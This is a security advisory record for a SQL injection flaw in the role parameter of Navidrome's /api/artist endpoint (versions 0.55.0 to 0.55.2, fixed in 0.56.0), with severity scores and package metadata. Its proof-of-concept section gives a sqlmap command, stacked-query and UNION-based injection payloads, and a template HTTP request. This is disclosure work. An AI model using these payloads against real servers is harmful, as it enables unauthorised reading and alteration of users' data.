GHSA-5wgp-vjxm-3x2r

Suggest an improvement
Source
https://github.com/advisories/GHSA-5wgp-vjxm-3x2r
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-5wgp-vjxm-3x2r/GHSA-5wgp-vjxm-3x2r.json
JSON Data
https://api.test.osv.dev/v1/vulns/GHSA-5wgp-vjxm-3x2r
Aliases
Published
2025-05-29T17:27:56Z
Modified
2025-06-03T18:44:13.402153Z
Severity
  • 8.9 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P CVSS Calculator
Summary
Navidrome allows SQL Injection via role parameter
Details

🛡 Security Advisory: SQL Injection Vulnerability in Navidrome v0.55.2

Overview

This vulnerability arises due to improper input validation on the role parameter within the API endpoint /api/artist. Attackers can exploit this flaw to inject arbitrary SQL queries, potentially gaining unauthorized access to the backend database and compromising sensitive user information.

Details

  • Vulnerable Component: API endpoint → /api/artist Parameter → role

  • Vulnerability Type: SQL Injection (stacked queries, UNION queries)

  • Database Affected: SQLite (confirmed exploitation via SQLite-specific payloads)

  • Impact: Successful exploitation allows an unauthenticated attacker to:

    • Execute arbitrary SQL commands
    • Extract or manipulate sensitive data (e.g., user records, playlists)
    • Potentially escalate privileges or disrupt service availability

Proof of Concept (PoC)

Example Exploit Command:

sqlmap.py -r navi --level 5 --risk 3 -a --banner --batch --tamper charencode --dbms sqlite

Sample Payloads:

  • Stacked Queries:

    http://navidrome/api/artist?_end=15&_order=ASC&_sort=name&_start=0&role=albumartist');SELECT LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))--

  • UNION-Based Query:

    http://navidrome.local/api/artist?_end=15&_order=ASC&_sort=name&_start=0&role=albumartist') UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,CHAR(113,98,118,98,113)||CHAR(113,84,86,119,114,71,106,104,90,118,120,104,79,66,104,108,121,106,70,68,90,113,104,117,67,98,113,67,103,84,71,120,119,119,117,121,81,76,100,71)||CHAR(113,120,112,106,113),92,92,92,92-- Mtny

Example HTTP Request:

GET /api/artist?_end=15&_order=ASC&_sort=name&_start=0&role=albumartist* HTTP/2
Host: <TARGET HOST>
Cookie: <REPLACE WITH VALID COOKIE>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: application/json
X-Nd-Authorization: <REPLACE WITH AUTH TOKEN>
X-Nd-Client-Unique-Id: <REPLACE WITH CLIENT ID>
Database specific 
{
    "nvd_published_at": "2025-05-30T20:15:44Z",
    "cwe_ids": [
        "CWE-89"
    ],
    "severity": "HIGH",
    "github_reviewed": true,
    "github_reviewed_at": "2025-05-29T17:27:56Z"
}
References

Affected packages

Go / github.com/navidrome/navidrome

Package

Name
github.com/navidrome/navidrome
View open source insights on deps.dev
Purl
pkg:golang/github.com/navidrome/navidrome

Affected ranges

Type
SEMVER
Events
Introduced
0.55.0
Fixed
0.56.0

Database specific 

{
    "last_known_affected_version_range": "<= 0.55.2"
}